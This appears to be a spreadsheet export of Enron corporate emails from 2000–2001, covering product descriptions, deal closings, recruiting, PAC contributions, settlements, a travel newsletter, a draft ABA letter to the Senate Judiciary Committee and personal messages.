To: Gualy, Jaime_x000D_
Subject: FW: Power Fin Swaption description_x000D_
_x000D_
_x000D_
Jaime,_x000D_
 _x000D_
Here is where we stand.  While they look at the language, I will be getting a little ahead by building all the elements in our TEST database for the purpose of testing.  For your knowledge, the pieces that take the longest are legal review and testing.  However, on this particular product/product type, we will be building everything from scratch.  We are not typically faced with this requirement, but we will get it done as quickly as possible.  Let me know if you have questions._x000D_
 _x000D_
Kevin_x000D_
-----Original Message-----_x000D_
From: Hansen, Leslie _x000D_
Sent: Tuesday, November 20, 2001 8:58 PM_x000D_
To: Meredith, Kevin_x000D_
Subject: RE: Power Fin Swaption description_x000D_
_x000D_
_x000D_
Kevin:_x000D_
 _x000D_
I wanted to be sure to touch base with you before the holidays.  I forwarded the Swaption to Brent Hendry last week.  The power components of the product is already done -- the floating price language -- so the only piece requiring review is strictly financial.  I will review as well but need Brent's comments._x000D_
 _x000D_
Leslie_x000D_
_x000D_
-----Original Message----- _x000D_
From: Meredith, Kevin _x000D_
Sent: Thu 11/15/2001 11:32 AM _x000D_
To: Hansen, Leslie _x000D_
Cc: Gualy, Jaime; Walker, Chris; Hoang, Charlie _x000D_
Subject: Power Fin Swaption description_x000D_
_x000D_
_x000D_
_x000D_
Leslie, _x000D_
_x000D_
Please review the attached document containing the long description for power swaptions, and make any changes you feel necessary._x000D_
_x000D_
&lt;&lt;Power swaption.doc&gt;&gt; _x000D_
_x000D_
Kevin Meredith _x000D_
_x000D_
EnronOnline _x000D_
(713) 853-9555 </t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 16:54:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'joseph.deffner@enron.com', 'chip.schneider@enron.com'})</t>
  </si>
  <si>
    <t>Saguaro</t>
  </si>
  <si>
    <t>We executed the purchase and sale agreement today.  Closing should occur in late October/early November and is subject only to bank and partner consents.  Bank consent will require NRG getting a  legal opinion on NRG's ability to close without violating QF status (we believe this is a non-issue but will require some handholding).  Our internal and Sale proceeds will be approx $20.793MM split between JEDI and ENA.  _x000D_
_x000D_
Chris Calger_x000D_
503-464-3735</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 09:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fwd: Re: ENRON-Resume Interview of James Valverde</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
We want to invite him for an interview,_x000D_
THU, 1-5. Interviews with KP, SG, VK, GK, BR, Molly, CS, Dan Rack._x000D_
_x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/26/2001 _x000D_
05:10 PM ---------------------------_x000D_
_x000D_
_x000D_
Johan Dahl &lt;jdahl@mrportland.com&gt; on 01/26/2001 05:04:50 PM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc:  _x000D_
Subject: Re: Fwd: Re: ENRON-Resume Interview of James Valverde_x000D_
_x000D_
_x000D_
Vince,_x000D_
James Valverde is confirmed for a Face-to-Face interview with you on Thursday _x000D_
February 1st at 1.00 PM to 5.00 PM.? When you have an interview itinerary, _x000D_
please share it with me so James know who he is interviewing with.? Please _x000D_
also tell me where you want him to show up, what floor, suite etc.? I am _x000D_
assuming you are in the building on 1400 Smith St., right?_x000D_
_x000D_
We have not discussed yet the details regarding what key skills and _x000D_
qualifications you are looking for in a candidate, other than that they are _x000D_
bright and talented. Could you please share, via email or over the phone, _x000D_
what you are looking for in candidate for your organization.? If you want me _x000D_
to put a search together, I can only do it by knowing what you want.? Thank _x000D_
you._x000D_
_x000D_
If there is anything else I can do for you before the interview on Thursday, _x000D_
please let me know._x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Johan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
At 04:39 PM 1/26/01 -0600, you wrote:_x000D_
_x000D_
Johan,_x000D_
_x000D_
Please, confirm the interview on Thursday next week, 1-5._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Johan Dahl &lt;jdahl@mrportland.com&gt; on 01/24/2001 12:04:42 PM_x000D_
_x000D_
To:?? Vince.J.Kaminski@enron.com_x000D_
cc:_x000D_
Subject:? Fwd: Re: ENRON-Resume Interview of James Valverde_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
JOHAN C. DAHL_x000D_
Director Energy Staffing Group_x000D_
Management Recruiters of Portland, Inc._x000D_
Phone: 503 -290-1153_x000D_
Phone: 800-979-8701_x000D_
Fax: 503-282-4380_x000D_
E-mail: jdahl@mrportland.com_x000D_
Web: www.mrportland.com/html/energy.htm_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Jul 2001 12:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Joe Allen has requested a $500 PAC contribution for Pat Rosenberg, a candidate running for HISD.  She is the wife of an Enron employee.  I have not requested contributions in school board races since our PAC funds are limited.  (Another Enron employee asked for $1000 PAC contribution for someone he was personally supporting for school board.)      _x000D_
_x000D_
Elizabeth Linnell gathered some historical data regarding PAC contributions to education candidates:_x000D_
_x000D_
	The PAC made contributions to the following organizations in 1997 and 1999 at $1,000 in each case:_x000D_
		Houston Citizens for Better Education_x000D_
		Houston Friends for Better Education_x000D_
		Houston Parents for Better Education_x000D_
		Houston Taxpayers for Better Education_x000D_
_x000D_
	In 1995 the PAC gave $500 to Lori Becker, a school board candidate._x000D_
_x000D_
Joe said that Pat Rosenberg has $20,000 in her campaign fund and he is trying to help her get more money in, as soon as possible, to get her numbers up.  What are your thoughts regarding PAC contributions to school board candidates?  I asked the same question of Sue Walden several weeks ago, and she indicated that she does not get involved in school board races.  Thanks,  Jean</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 03:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'denise.lagesse@enron.com', 'janet.cones@enron.com'})</t>
  </si>
  <si>
    <t>Transition To Do List</t>
  </si>
  <si>
    <t>Janet, please meet with Denise (tomorrow if possible) to:_x000D_
_x000D_
- explain filing system_x000D_
- hand off filing projects you are working on (anytime between tomorrow and _x000D_
next week is fine)_x000D_
- explain how you do service lists for FERC filings._x000D_
_x000D_
Also, one of you will need to contact the appropriate person to get Denise _x000D_
access to my Lotus Organizer._x000D_
Don't know how to notify the mailroom people to deliver my mail to Denise's _x000D_
station but see if you can do this also._x000D_
_x000D_
I spoke with Mike, and Emily is going to handle moving the phones._x000D_
_x000D_
Merci beaucoup!</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 23:11:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'expediatraveldeals_031352@expedia.customer-email.com'})</t>
  </si>
  <si>
    <t>Great travel deals from $19; enjoy the holiday!</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE] =09_x000D_
_x000D_
_x000D_
=09[IMAGE][IMAGE][IMAGE] [IMAGE][IMAGE][IMAGE][IMAGE][IMAGE][IMAGE][IMAGE] =_x000D_
=09=09_x000D_
_x000D_
_x000D_
   [IMAGE]  [IMAGE]  [IMAGE]  [IMAGE]   =09=09_x000D_
_x000D_
   =20_x000D_
           [IMAGE]      IN THIS ISSUE     [IMAGE]    Flight deals         [=_x000D_
IMAGE]    Vacation deals         [IMAGE]    Hotel deals         [IMAGE]    =_x000D_
Cruise deals            [IMAGE]    Car rental deals         [IMAGE]   More =_x000D_
deals          [IMAGE]               =09[IMAGE]=09 Dear Paul,   Looking for=_x000D_
 a travel bargain? You've come to the right place. Click to our Deals  page=_x000D_
 for a quick snapshot of all the best deals on Expedia.com -- flights, vaca=_x000D_
tions, hotels, car rental, and cruises -- starting at just $19. For more de=_x000D_
als, see our Flight Deals  page (from $92), Hotel Deals  page (from $25), a=_x000D_
nd Vacation Dream Deals  page (from $143). Enjoy the deals ... and wherever=_x000D_
 the upcoming holiday finds you, we wish you  fun, relaxing times and smoot=_x000D_
h traveling.   [IMAGE]      Search for a flight      [IMAGE]  Leaving from:=_x000D_
   Depart: (MM/DD/YY)   Morning   Afternoon Evening  1 adult 2 adults 3 adu=_x000D_
lts 4 adults 5 adults 6 adults       [IMAGE] Going to:   Return: (MM/DD/YY)=_x000D_
   Morning   Afternoon Evening         EXPEDIA'S TOP TRAVEL DEALS         F=_x000D_
light deals [IMAGE] [IMAGE]  Roundtrip flights from $92, deals on Europe fl=_x000D_
ights,  and more      [IMAGE] [IMAGE] Fly ATA and save: 15% off all flights=_x000D_
      [IMAGE] [IMAGE] Save up to 60% on your flight with Expedia Bargain Fa=_x000D_
res          Vacation deals [IMAGE] [IMAGE]  Orlando family fun deal! Three=_x000D_
-night air/hotel vacation from $209       [IMAGE] [IMAGE] Caribbean sale: G=_x000D_
et up to 30% off select all-inclusive vacations in Jamaica and Turks and Ca=_x000D_
icos       [IMAGE] [IMAGE] Relax in luxury in Chicago: Three-night, four-st=_x000D_
ar air/hotel vacation from $354     [IMAGE] [IMAGE] See more vacation packa=_x000D_
ge deals         Lodging deals [IMAGE] [IMAGE]  Hit the slopes and stay in =_x000D_
snowy style! Ski hotel deals from $74 per night         [IMAGE] [IMAGE] Mau=_x000D_
i: Four-star Aston Kaanapali Shores from $138 until 12/22       [IMAGE] [IM=_x000D_
AGE] Orlando: Clarion Hotel Maingate from $39 until 12/26. Catch the free D=_x000D_
isney Shuttle!     [IMAGE] [IMAGE] See our Hot Lodging Deals: 40 destinatio=_x000D_
ns, over 100 great deals         Cruise deals [IMAGE] [IMAGE]  Take a fun t=_x000D_
wo-day "Cruise to Nowhere" on Carnival (Mobile roundtrip) from $179       [=_x000D_
IMAGE] [IMAGE] Five-day western Caribbean cruise on Carnival (Galveston rou=_x000D_
ndtrip) from $299       [IMAGE] [IMAGE] 14-day Circle the Caribbean cruise =_x000D_
on Holland America (Tampa roundtrip) from $999     [IMAGE] [IMAGE] See spec=_x000D_
ial discounted cruise deals         Car rental [IMAGE] [IMAGE]  Holiday roa=_x000D_
d trip? Save up to 15% on your rental car, with Avis!           EXPLORE EXP=_x000D_
EDIA          [IMAGE] [IMAGE] Expedia Recommends Chicago: It's your kinda t=_x000D_
own; find out why       [IMAGE] [IMAGE] Cancun Slide Show: Bask in the warm=_x000D_
 sunshine and warmer hospitality of Mexico       [IMAGE] [IMAGE] Expedia.co=_x000D_
m Best Places: Discover Waikiki's historic charms       [IMAGE]  [IMAGE]   =_x000D_
Vacation Rentals: All the comforts of home from $75 per night!   Check out =_x000D_
our Vacation Rental Deals , for great rates on vacation homes, condos, and =_x000D_
villas in the United States and around the world. Vacation Rentals are the =_x000D_
ultimate vacation solution for families and groups.    [IMAGE]   UNSUBSCRIB=_x000D_
E   If you do not wish to receive any further promotional e-mails from us, =_x000D_
please click here . Or simply reply to this mail with "unsubscribe" in the =_x000D_
subject line.   CONTACT US  If you'd like to give us feedback, please click=_x000D_
 here . For additional assistance, visit the Expedia.com Customer Support C=_x000D_
enter .    Prices are subject to availability and subject to change without=_x000D_
 notice. Prices shown may not include applicable taxes, fees and fuel surch=_x000D_
arges.    Photo: PhotoDisc   ?2001 Expedia, Inc. All rights reserved.    =_x000D_
=09_x000D_
_x000D_
_x000D_
[IMAGE]=09_x000D_
[IMAGE]=09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 03:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron Online Report</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to introduce myself and let you know that the Portland West Desk has _x000D_
a new person in Deal Control. I'm sure you know from working with Carla _x000D_
Hoffman that the position requires quite a bit of communication with your _x000D_
group regarding Enpower program development; so if there is anything I can do _x000D_
to facilitate the speed or success of your tasks, please let me know. _x000D_
_x000D_
The first Enpower question I have is regarding the Enron Online Report. _x000D_
Apparently Carla had requested a few changes, which were then put into a _x000D_
stage version of the program. I'm wondering if we can get that report into _x000D_
production, and more importantly, if we can make a few more minor changes to _x000D_
it. Right now I'm running reports by logging on as Carla, which is fine, but _x000D_
eventually we'd like to see the EOL report up and running for everyone to use._x000D_
_x000D_
I know that Carla and Nicolay have worked on it in the past, and I think it _x000D_
would be relevant to talk with them about issues and obstacles they found in _x000D_
the report. I look forward to meeting you (via telephone or otherwise!)._x000D_
_x000D_
Thanks,_x000D_
Kate </t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 10:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.johnson@enron.com', 'knotestine@littler.com'})</t>
  </si>
  <si>
    <t>Midwest Generation</t>
  </si>
  <si>
    <t>Hi, Kerry and Rick,_x000D_
_x000D_
Hope you are enjoying the employer.  Here, it is flooding again -- my son's school is closed today because of flooding.  What fun!_x000D_
_x000D_
Here is a request from our business guys to get information on a potential labor dispute.  Any information you can get without being obvious would be helpful._x000D_
_x000D_
Thanks._x000D_
_x000D_
Michelle_x000D_
_x000D_
_x000D_
_x000D_
---------------------------------------------------------------------------------------------------------_x000D_
_x000D_
Michelle Cash_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3823_x000D_
Houston, Texas  77002_x000D_
(713) 853-6401_x000D_
michelle.cash@enron.com_x000D_
_x000D_
This message may contain confidential information that is protected by the attorney-client and/or work product privileges._x000D_
----- Forwarded by Michelle Cash/HOU/ECT on 06/07/01 07:37 AM -----_x000D_
_x000D_
_x000D_
	Jeffrey T Hodge 06/06/01 06:28 PM 	   To: Michelle Cash/HOU/ECT@ECT  cc: Philip Mayor/ENRON@enronXgate  Subject: Midwest Generation	_x000D_
_x000D_
_x000D_
Michelle:_x000D_
_x000D_
Pursuant to our telephone conversation, I am forwarding you this e-mail.  As I advised we would like to obtain whatever information we can on a labor situation between Midwest Generation and the IBEW in the Chicago area.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 5 Jul 2001 12:42:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tape</t>
  </si>
  <si>
    <t>Chip,_x000D_
I need to have a tape pulled for Ryan Slinger on July 3 at 14:40 and 14:45.  Let me know when you have the time and I will go up with you to pull the tape._x000D_
Thanks,_x000D_
Bill</t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 05:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PLEASE READ THIS</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Susan M Scott/HOU/ECT on 03/30/2000 01:45 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Stephen Plauche@ENRON_x000D_
03/30/2000 01:11 PM_x000D_
To: Susan M Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Take me out to the ...  _x000D_
_x000D_
Susan,_x000D_
 I find that you have a midly attractive sense of humor and a cynical side to _x000D_
you that separates you from the rest of the tribe.  Its funny you mentioned _x000D_
the Astros game.  I was actually thinking of inviting you (since I have two _x000D_
tickets to tonight's game and all) but you have turned me down so many times _x000D_
in the past I decided to go with a more conservative pick.  Anyhow, since I _x000D_
absolutely detest Woody's and all of my bold suggestions for other venues _x000D_
consistently gets dissed by the group's brain trust, please take me off of _x000D_
this distribution list.  Have a nice day._x000D_
_x000D_
Steve_x000D_
_x000D_
_x000D_
_x000D_
Susan M Scott@ECT_x000D_
03/30/2000 12:38 PM_x000D_
To: val.generes@ac.com, Timothy Blanchard/HOU/EES@EES, Robert _x000D_
Norton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Benjamin _x000D_
Freeman/Corp/Enron@ENRON, Lisa Gillette/HOU/ECT@ECT, Kyle Etter/HOU/ECT@ECT, _x000D_
Victor Guggenheim/HOU/ECT@ECT, Daniel Falcone/Corp/Enron@ENRON, Shanna _x000D_
Husser/Corp/Enron@Enron, Yvette Parker/Corp/Enron@ENRON, Christopher _x000D_
Coffman/Corp/Enron@Enron, Stephen Plauche/Corp/Enron@Enron, Dan _x000D_
Feather/Enron_Development@ENRON_DEVELOPMENT, Eric Bass/HOU/ECT@ECT, Nick _x000D_
Hiemstra/HOU/ECT@ECT, Chad Landry/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT, _x000D_
Misti Day/HOU/ECT@ECT, Benjamin Markey/HOU/ECT@ECT, Carrie _x000D_
Southard/HOU/ECT@ECT, Christa Winfrey/HOU/ECT@ECT, Brian Hoskins/HOU/ECT@ECT, _x000D_
Bryan Hull/HOU/ECT@ECT, Heather Alon/HOU/ECT@ECT, Sheetal Patel/HOU/ECT@ECT, _x000D_
Hang Bui/HOU/ECT@ECT, Kreg Hall/HOU/ECT@ECT, Michael Kolman/HOU/ECT@ECT, _x000D_
Mason Hamlin/HOU/ECT@ECT, Jennifer Reside/HOU/ECT@ECT, Tobin _x000D_
Carlson/HOU/ECT@ECT, Alicia Perkins/HOU/ECT@ECT, Nicholas J _x000D_
Stephan/HOU/ECT@ECT, Lisa Gillette/HOU/ECT@ECT, Kyle Etter/HOU/ECT@ECT, _x000D_
Victor Guggenheim/HOU/ECT@ECT, Sunil Dalal/Corp/Enron@ENRON, Wilson _x000D_
Kriegel/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Take me out to the ..._x000D_
_x000D_
Oh wait, I can't go to the ball game because I couldn't take a day off from _x000D_
work to stand in the Enron lobby (or send my secretary to do it for me).  _x000D_
_x000D_
For all of you who have managed to snag tickets for tonight's game _x000D_
congratulations and you suck.  For the rest of us stuck out in the cold I _x000D_
suggest the only viable alternative before us is to drown our sorrows in a _x000D_
cold bottle of beer (or two, or three...).  I realize the mass email has been _x000D_
MIA the last two weeks.  For some this may have been a welcomed relief.  For _x000D_
others there may have been some concern that they had been cut-off from the _x000D_
distribution.  At present no one has been removed from the distribution, but _x000D_
it is undergoing an audit.  Should it be determined that it is necessary to _x000D_
remove an individual from the list for any reason that individual will be _x000D_
notified and given an explanation.  If anyone would like to know the causes _x000D_
for expulsion you can write to:  I CAN'T BELIEVE ANYONE CARES IF THERE ON _x000D_
THIS DISTRIBUTION OR NOT BECAUSE THE ONLY PLACE WE SEEM TO GO IS WOODY'S _x000D_
EVERY THURSDAY BETWEEN 9:30 AND 10:00._x000D_
_x000D_
On that note, see you guys at Woody's tonight around 9:30 or 10:00._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 11:45:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jpetriello@prebon.com'})</t>
  </si>
  <si>
    <t>Prebon Energy has sent you a message</t>
  </si>
  <si>
    <t xml:space="preserve">Please note the time of the party is 6 p.m. to 10 p.m._x000D_
_x000D_
To view your invitation click the web address below or copy and paste it into your web browser:_x000D_
http://www.sendomatic.com/servlets/v?e=61930&amp;u=745843_x000D_
_x000D_
If you are having trouble viewing the above web address, visit_x000D_
http://www.sendomatic.com/servlets/l?u=sandra.f.brawner@enron.com_x000D_
_x000D_
Hope you have fun!_x000D_
_x000D_
--_x000D_
_x000D_
P.S. If you'd like to send your own personalized invitations or announcements go to http://www.sendomatic.com_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 11:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ross.prevatt@enron.com'})</t>
  </si>
  <si>
    <t>Re: Managing Energy Price Risk Articles</t>
  </si>
  <si>
    <t xml:space="preserve">Ross, _x000D_
_x000D_
I shall call Risk on Thursday._x000D_
_x000D_
Vince_x000D_
_x000D_
Shirley, please, remind me about it._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ross Prevatt                           05/23/2000 12:19 PM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Managing Energy Price Risk Articles_x000D_
_x000D_
Hi Vince, I have a quick question for you.  The EOL folks want to put a _x000D_
couple of articles from the Risk book (Managing Energy Price Risk) on the _x000D_
internet.  I told them that  would be a copywrite violation.  Is there _x000D_
someone at Risk they could call to get permission for this, or is it even _x000D_
worth calling?  Thanks_x000D_
_x000D_
Ross_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 13:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pfrayne@aol.com'})</t>
  </si>
  <si>
    <t>frozenset({'drferg529@aol.com', 'ngdecler@facstaff.wisc.edu', 'tomfrayne@aol.com', 'cfgem@eiu.edu', 'rcolyar@sct.co.santa-clara.ca.us', 'pnlent@mcn.org', 'mcappi@aol.com', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>No Subject</t>
  </si>
  <si>
    <t>best of year</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 03:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Settlements Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings-_x000D_
I will be passing out a report of settlements issues that have come from _x000D_
Volume Mgmt.     If your name appears on the report, then you are responsible _x000D_
for clearing this discrepancy._x000D_
You may not have been actually working during this time period,  ie,  a deal _x000D_
may have been extended in scheduling under your name._x000D_
However,  I am holding each person who's name appears responsible for _x000D_
clearing this  issue.   If you are required to pull tapes,  come see me for _x000D_
approval._x000D_
_x000D_
Several issues on the list have been cleared previously.   We must _x000D_
communicate this info to Caroline so that she can make the appropriate _x000D_
entries into the _x000D_
DMS (Dispute Management System).      You may be asked to complete other _x000D_
settlements discrepancies as well._x000D_
_x000D_
This is a huge issue,  as our trading strategies were a bit hard to follow _x000D_
from Settlements viewpoint.    We need to assist this process to make sure _x000D_
that Enron gets the actual money that Real Time claimed that we made._x000D_
_x000D_
I want everyone to understand that just because we have a discrepancy with a _x000D_
customer,  I am certainly not assuming that you/we are in the wrong._x000D_
In more than one half of all disputes,  we are correct.    In this case,  we _x000D_
need to prove our position with tapes,  etc._x000D_
_x000D_
_x000D_
Thanks,_x000D_
_x000D_
JMF_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 07:53:59 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'orsi@tconl.com'})</t>
  </si>
  <si>
    <t>RE: First day</t>
  </si>
  <si>
    <t>Where did you sleep l ast night.  By theway, Brad does not want the couch._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Larry Orsi &lt;Orsi@tconl.com&gt;@ENRON [mailto:IMCEANOTES-Larry+20Orsi+20+3COrsi+40tconl+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, August 22, 2001 9:52 AM_x000D_
To:	Tholt, Jane M._x000D_
Subject:	First day_x000D_
_x000D_
Hi Honey,_x000D_
_x000D_
    With the Ors, have a full itenery planed, miss you. Day one is_x000D_
complete, No injuries</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 02:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hwillmert@cilco.com'})</t>
  </si>
  <si>
    <t>December Bid Request</t>
  </si>
  <si>
    <t xml:space="preserve"> - BIDREQ12.doc</t>
  </si>
  <si>
    <t>Thu, 26 Jul 2001 07:58:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'f..campbell@enron.com', 'jim.cashion@enron.com'})</t>
  </si>
  <si>
    <t>NYISO 7/19</t>
  </si>
  <si>
    <t>Hey Larry,_x000D_
_x000D_
I made some changes to 7-19..._x000D_
_x000D_
695979.1 &amp; 695995.1 - had extra hour (HE 23) - I zeroed this hour out (NYISO 5081505)_x000D_
694766.1 - missing HE 11&amp;12 per PJM &amp; NYISO - I added these two hours in_x000D_
_x000D_
Please check these changes and let me know if you do not agree with them._x000D_
_x000D_
Thanks,_x000D_
Michael_x000D_
x35098</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 07:19:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'akell00@sears.com'})</t>
  </si>
  <si>
    <t>frozenset({'corpgen@mail.abanet.org'})</t>
  </si>
  <si>
    <t>Re: Committee of Corporate General Counsel</t>
  </si>
  <si>
    <t>I agree with my friend Paul._x000D_
_x000D_
Stasia Kelly_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Paul J. Polking" &lt;paul.polking@BANKOFAMERICA.COM&gt;@MAIL.ABANET.ORG&gt; on_x000D_
11/21/2001 08:36:39 AM_x000D_
_x000D_
Please respond to paul.polking@BANKOFAMERICA.COM_x000D_
_x000D_
Sent by:  Committee of Corporate General Counsel of the Business Law_x000D_
      Section &lt;CORPGEN@MAIL.ABANET.ORG&gt;_x000D_
_x000D_
_x000D_
To:   CORPGEN@MAIL.ABANET.ORG_x000D_
cc:_x000D_
_x000D_
Subject:  Re: Committee of Corporate General Counsel_x000D_
_x000D_
_x000D_
I have no objection to your sending a letter.  However, I would say that_x000D_
"the Committee of Corporate General Counsel encourages the Judiciary_x000D_
Committee and the full Senate to act upon the confirmation of nominees for_x000D_
the Judiciary as expeditiously as possible."_x000D_
_x000D_
Paul Polking_x000D_
704/386-5724_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Morgan, Charles" &lt;Charles.Morgan@BELLSOUTH.COM&gt; on 11/20/2001 01:16:07 PM_x000D_
_x000D_
Please respond to "Morgan, Charles" &lt;Charles.Morgan@BELLSOUTH.COM&gt;_x000D_
_x000D_
To:   CORPGEN@MAIL.ABANET.ORG_x000D_
cc:_x000D_
Subject:  Committee of Corporate General Counsel_x000D_
_x000D_
_x000D_
_x000D_
Our Committee has been asked to send a letter to the Senate Judiciary_x000D_
Committee, supporting the expeditious consideration of nominees for Federal_x000D_
Judgeships. Following is a draft letter for your review and comment. Please_x000D_
note that we take no position on individuals or partisan issues._x000D_
_x000D_
Please let me know if you are in support or if you have any objection to_x000D_
the_x000D_
letter. We are requested to send the letter right away, so would appreciate_x000D_
your prompt response. Many thanks._x000D_
_x000D_
_x000D_
November 20, 2001_x000D_
_x000D_
_x000D_
The Honorable Patrick J. Leahy_x000D_
Chairman, United States Senate_x000D_
 Committee on the Judiciary_x000D_
433 Russell Senate Office Building_x000D_
United States Senate_x000D_
Washington, DC 20510_x000D_
_x000D_
Dear Senator Leahy:_x000D_
_x000D_
        I am Chairman of the Committee of Corporate General Counsel, which_x000D_
is part of the Business Law Section of the American Bar Association. Our_x000D_
membership is comprised of the senior-most legal officers of many of_x000D_
America's largest companies._x000D_
_x000D_
        Our members have asked me to write to you, in your capacity as_x000D_
Chairman of the Senate Judiciary Committee, to express our views concerning_x000D_
the importance of the Federal Judiciary._x000D_
_x000D_
        The tragic events of September 11 underscore for all of us the_x000D_
freedoms that we enjoy in our country. We know that you and your fellow_x000D_
Senators on the Judiciary Committee are devoted to helping protect these_x000D_
precious freedoms. We also know that you and your fellow Senators recognize_x000D_
the critical importance of our system of justice in preserving and_x000D_
protecting these freedoms._x000D_
_x000D_
        We write to express our thanks to you and your colleagues for your_x000D_
efforts in reviewing the qualifications of individuals nominated for_x000D_
Federal_x000D_
District Court and Circuit Court positions. Recognizing the need for a_x000D_
fully-staffed Federal Judiciary, we also appreciate all your efforts in_x000D_
determining the qualifications of nominees for the Judiciary as_x000D_
expeditiously as possible._x000D_
_x000D_
         If our organization, or any of our members, may ever be of_x000D_
assistance in any way, I hope you will call upon us. Thank you._x000D_
_x000D_
_x000D_
                                        Sincerely,_x000D_
_x000D_
_x000D_
_x000D_
cc:     The Honorable Orrin G. Hatch, Ranking Minority Member_x000D_
        The Honorable Joseph R. Biden, Jr., Member_x000D_
        The Honorable Sam Brownback, Member_x000D_
        The Honorable Maria Cantwell, Member_x000D_
        The Honorable Mike DeWine, Member_x000D_
        The Honorable Richard Durbin, Member_x000D_
        The Honorable John Edwards, Member_x000D_
        The Honorable Russell D. Feingold, Member_x000D_
        The Honorable Dianne Feinstein, Member_x000D_
        The Honorable Charles E. Grassley, Member_x000D_
        The Honorable Edward M. Kennedy, Member_x000D_
        The Honorable Herb Kohl, Member_x000D_
        The Honorable Jon Kyl, Member_x000D_
The Honorable Mitch McConnell, Member_x000D_
        The Honorable Charles Schumer, Member_x000D_
        The Honorable Jeff Sessions, Member_x000D_
        The Honorable Arlen Specter, Member_x000D_
        The Honorable Strom Thurmond, Member_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Charles R. Morgan_x000D_
Executive Vice President and General Counsel_x000D_
BellSouth Corporation_x000D_
1155 Peachtree Street, N. E._x000D_
Suite 2002_x000D_
Atlanta, Georgia 30309-3610_x000D_
(404) 249-2050_x000D_
(404) 249-5948 Fax_x000D_
Charles.Morgan@BellSouth.COM</t>
  </si>
  <si>
    <t>Sun, 7 Jan 2001 23:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EFF_DT PORTFOLIO_ID DOWN95_x000D_
1/5/01  MANAGEMENT-CRD 24,752._x000D_
1/5/01  MANAGEMENT-GAS 220,002._x000D_
1/5/01  MANAGEMENT-PWR 127,715._x000D_
1/5/01  AGG-MANAGEMENT 330,482.</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2001 23:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christina.sanchez@enron.com'})</t>
  </si>
  <si>
    <t>Good gossip</t>
  </si>
  <si>
    <t>i just heard that scooter is working at dynegy.  e-mail me back.  for instant _x000D_
messenger go to netscape or to aol and you can get hooked up. its no biggie</t>
  </si>
  <si>
    <t>Thu, 27 Jan 2000 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: What's the buzz?</t>
  </si>
  <si>
    <t>If you are in Houston on Feb 10 and HAVE NOT PLANNED ON HAVING DINNER WITH _x000D_
ME, then just don't plan on coming.  I mean, after your last lame excuse _x000D_
about that hotel by the airport, I'm gonna take it real personal if the only _x000D_
hotel room you can get this time is in Pearland.  Ya know what I mean..._x000D_
_x000D_
Anyway, I have been thinking about you and wondering what you're up to.  For _x000D_
